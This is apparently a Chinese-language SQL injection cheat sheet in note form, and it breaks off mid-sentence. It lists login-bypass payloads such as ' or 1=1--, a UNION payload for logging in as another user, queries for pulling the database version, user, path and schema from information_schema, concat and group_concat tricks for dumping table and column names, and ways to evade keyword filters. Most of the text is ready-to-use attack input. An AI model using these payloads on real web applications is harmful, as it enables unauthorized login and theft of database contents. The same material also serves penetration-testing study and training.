Sql

UNION 先想办法结束上个语句，再用UNION拼接下一个语句 堆叠注入 同上，但用;拼接 WHERE 使其SELECT所有数据 注入： admin’ – admin’ # admin’/* ’ or 1=1– ’ or 1=1# ’ or 1=1/* ‘) or ‘1’=‘1– ‘) or (‘1’=‘1– 以不同的用户登陆 ’ UNION SELECT 1, ‘anotheruser’, ‘doesnt matter’, 1– 报错注入

信息的获取 SELECT version() 数据库版本 user() 数据库用户名 database 数据库名 @@datadir 数据库路径 @@version_compile_os 操作系统版本 其他 show columns from table_name;列信息 show databases;所有数据库名 show tables;所有表名 注入 1' order by 2 # 检查记录数量 字符串拼接 concat(str1,str2,…) 能够将你查询的字段连接在一起 concat_ws(separator,str1,str2,) 能够自定义分隔符来将你查询的字段链接在一起 group_concat([DISTINCT] column [Order BY ASC/DESC column] [Separator separator]) Example SELECT concat(table_name, ' ',column_name) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = DATABASE(); SELECT group_concat(table_name, column_name separator '_') FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = DATABASE(); 关键字被过滤 简单的有: 大小写混用(seLect,whEre…) SEL<>ECT(php) 空格 -> () = -> like 但是极其容易被堵,其他方法有以下...